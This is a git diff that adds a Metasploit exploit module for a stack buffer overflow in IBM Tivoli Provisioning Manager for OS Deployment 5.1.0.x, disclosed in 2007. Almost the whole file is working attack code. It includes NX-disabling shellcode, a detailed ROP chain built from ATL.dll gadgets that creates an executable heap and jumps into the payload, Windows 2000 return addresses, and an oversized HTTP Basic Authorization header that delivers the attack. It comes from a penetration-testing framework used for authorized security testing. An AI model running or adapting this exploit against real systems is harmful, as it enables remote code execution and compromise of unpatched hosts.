diff --git a/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb b/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb new file mode 100644 index 0000000000..dbdeb0e89a --- /dev/null +++ b/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb @@ -0,0 +1,222 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/projects/Framework/ +## + +require 'msf/core' + +module Msf + +class Exploits::Windows::Http::Ibm_Tpmfosd_Overflow < Msf::Exploit::Remote + + include Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow', + 'Description' => %q{ + This is a stack overflow exploit for IBM Tivoli Provisioning Manager + for OS Deployment version 5.1.0.X. + }, + 'Author' => 'toto', + 'License' => MSF_LICENSE, + 'Version' => '$Revision: 3583 $', + 'References' => + [ + [ 'URI', 'http://dvlabs.tippingpoint.com/advisory/TPTI-07-05' ], + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + }, + 'Privileged' => true, + 'Payload' => + { + 'Space' => 0x200, + 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\$%\x1a", + 'Prepend' => + # Disable NX on 2k3 to upload data on the stack + # (service crashes if the stack is switched to the heap) + "\xb9\x70\x02\xfe\x7f" + # mov ecx, 0x7ffe0270 + "\x80\x39\x02" + # cmp byte ptr [ecx], 2 + "\x75\x15" + # jmp after + "\xba\x00\x03\xfe\x7f" + # mov edx, 0x7ffe0300 + "\xb8\xed\x00\x00\x00" + # mov eax, 0xed + "\x6a\x04" + # push 4 + "\x51" + # push ecx + "\x6a\x22" + # push 22 + "\x6a\xff" + # push -1 + "\x6a\xff" + # push -1 (padding) + "\xff\x12", # call dword ptr[edx] + 'StackAdjustment' => -3500, + }, + 'Platform' => 'win', + 'Targets' => + [ + ['TMPfOSD 5.1 (Windows 2000 SP4 - English)', { 'Rets' => [0x77bb53af, 0x77bb06f0, 0x75022ac5] }], + # tested against 5.1.0.1 and 5.1.0.2 (use ATL.Dll) + ['TMPfOSD 5.1 (Windows 2003 All - English)', { 'IB' => 0x76a80000 }], + ], + 'DisclosureDate' => 'May 02 2007', + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(443), + OptBool.new('SSL', [true, 'Use SSL', true]), + ], self.class ) + end + + def exploit + + if target.name =~ /2003/ + # the exploit allocates and executable heap to copy and execute the payload + + auth = Rex::Text.rand_text_alphanumeric(2800) + + ib = target['IB'] + + auth[ 2080, 4 ] = [ ib + 0x11010 ].pack('V') # store a data to prevent a crash + + # ret 1: + # 76a81a5f: + # pop esi <- 0x76a91010 + # pop ebx <- 0x76a91010 + # pop ebp <- 0x76a91010 + # retn + + auth[ 2096, 4 ] = [ ib + 0x1a5f ].pack('V') + auth[ 2100, 4 ] = [ ib + 0x11010 ].pack('V') + auth[ 2104, 4 ] = [ ib + 0x11010 ].pack('V') + auth[ 2108, 4 ] = [ ib + 0x11010 ].pack('V') + + # ret 2: + # 76a817f0: + # pop esi <- 0x76a81512 (ocscpy pointer) + # retn + + auth[ 2112, 4 ] = [ ib + 0x17f0 ].pack('V') + auth[ 2116, 4 ] = [ ib + 0x1512 ].pack('V') + + # ret 3: (copy the payload in atl.dll data) + # 76a811c8 + # lea eax, [esp+3c] <-- eax points to the payload + # push eax <- payload + # push ebp <- 0x76a91010 + # call esi <- ocscpy + # cmp eax, ebx <- eax == ebx = 0x76a91010 + # jnz before <- jump not taken + # mov eax, ebp + # pop edi + # pop esi + # pop ebp + # pop ebx + # add esp, 1ch + # retn + + auth[ 2120, 4 ] = [ ib + 0x11c8 ].pack('V') + + + # ret 4: (increase the stack pointer to allow a jump back in the payload) + # add esp, 1ch + # retn + + auth[ 2160, 4 ] = [ ib + 0x11da ].pack('V') + auth[ 2184, 2 ] = "\xeb\x56" # jmp payload + + + # ret 5: (create an executable heap - huge one) + # 76a8c0c4 + # jmp ds:__imp_HeapCreate (0xffffffff, 0x01010101, 0x01010101) + + auth[ 2196, 4 ] = [ ib + 0xc0c4 ].pack('V') + + # ret 6: + # 76a817f0 + # pop esi <- 0x76a92a38 (hHeap) + # retn + + auth[ 2204, 4 ] = [ ib + 0x17f0 ].pack('V') + auth[ 2208, 4 ] = [ 0xffffffff ].pack('V') + auth[ 2212, 4 ] = [ 0x01010101 ].pack('V') + auth[ 2216, 4 ] = [ 0x01010101 ].pack('V') + auth[ 2220, 4 ] = [ ib + 0x12a38 ].pack('V') + + # ret 7: + # 76a8190a + # mov [esi], eax <- store new heap in hHeap + # mov eax, esi + # pop esi + # retn 4 + + auth[ 2224, 4 ] = [ ib + 0x190a ].pack('V') + + # ret 8 (_calloc - needed to allocate a small buffer to prevent a no mem exception): + # 76a88a29 + # mov eax, [esp+arg_0] <- 0x7fffffa0 + # imul eax, [esp+arg_4] <- eax * 0x7fffffa0 = 0x2400 + # push eax + # call _malloc + # pop ecx <- ecx = 0x2400 + # retn + + auth[ 2232, 4 ] = [ ib + 0x8a29 ].pack('V') + + # ret 9: + # 76a8c9ab + # add esp, 0ch + # retn 4 + + auth[ 2240, 4 ] = [ ib + 0xc9ab ].pack('V') + auth[ 2244, 4 ] = [ 0x7fffffa0 ].pack('V') + auth[ 2248, 4 ] = [ 0x7fffffa0 ].pack('V') + + # ret 10 (copy payload into heap): + # 76a8c9a0 + # push ecx <- 0x2400 + # push [esp+8] <- 0x76a91010 (payload in atl.dll data) + # push eax <- heap pointer + # call _memcpy + # add esp, 0ch + # retn + + auth[ 2256, 4 ] = [ ib + 0xc9a0 ].pack('V') + + # ret 11 (jump into heap) + # 76a815e7 + # call eax + + auth[ 2264, 4 ] = [ ib + 0x15e7 ].pack('V') + auth[ 2268, 4 ] = [ ib + 0x11010 ].pack('V') + + auth[ 2272, payload.encoded.length ] = payload.encoded + + else + auth = Rex::Text.rand_text_alphanumeric(2800) + + auth[ 2080, 4 ] = [ target['Rets'][1] ].pack('V') + auth[ 2096, 4 ] = [ target['Rets'][2] ].pack('V') # pop, ret + auth[ 2100, 4 ] = [ target['Rets'][1] ].pack('V') + auth[ 2104, 4 ] = [ target['Rets'][0] ].pack('V') # jmp esp + auth[ 2108, payload.encoded.length ] = payload.encoded + + end + + print_status("Trying target #{target.name}...") + + res = send_request_cgi({ + 'uri' => '/', + 'method' => 'GET', + 'headers' => + { + 'Authorization' => "Basic #{auth}" + } + }, 5) + + handler + end + +end +end